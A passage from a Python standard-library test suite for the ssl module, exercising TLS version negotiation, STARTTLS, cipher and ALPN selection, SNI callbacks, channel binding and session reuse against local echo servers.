try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
client_ctx, server_ctx, hostname = testing_context()
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = server_ctx.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = client_ctx.wrap_socket(
socket.socket(), server_hostname=hostname
)
client.connect((hostname, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.3')
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
client_context, server_context, hostname = testing_context()
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_tls_version('TLSv1_1')
@ignore_deprecation
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
client_context, server_context, hostname = testing_context()
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
with self.assertRaises(ssl.SSLError):
server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_npn_protocols(self):
assert not ssl.HAS_NPN
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(os_helper.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with open(os_helper.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
